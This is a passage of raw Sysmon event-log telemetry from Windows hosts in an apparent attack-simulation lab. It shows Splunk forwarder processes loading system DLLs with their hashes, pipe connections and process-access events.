17:30:31.301{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x80000000000000001531006Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.301{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531005Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.285{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531004Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.286{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001531003Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.285{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531002Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.285{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531001Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.285{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531000Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.285{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001530999Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.285{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001530998Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.285{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001530997Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.105{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530996Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.105{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C482E2BB2928802CBE0DFA7B8C883EC3,SHA256=64DE42B0366EE258A44DBB4BE055C0D57C892427D5781DDC768B67561F36EF3Ffalsefalse - insufficient disk space 10341000x80000000000000001061185Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:31.060{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061184Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:31.060{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061191Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:32.194{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FE9F4365176A49C20935D3BD0F3B17E,SHA256=40B2AA4D0107F706D116243A07006E276B439717116E91C8111E230C43154698,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001531176Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.811{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001531175Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.811{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001531174Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.811{21761711-6138-6080-C25D-00000000BB01}62925908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531173Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.811{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001531172Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.811{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001531171Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001531170Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531169Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531168Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001531167Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531166Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001531165Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001531164Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001531163Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531162Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001531161Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001531160Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001531159Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001531158Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001531157Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001531156Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001531155Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001531154Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001531153Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001531152Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001531151Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001531150Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001531149Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001531148Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001531147Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001531146Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001531145Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531144Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531143Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001531142Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531141Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531140Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531139Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531138Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program 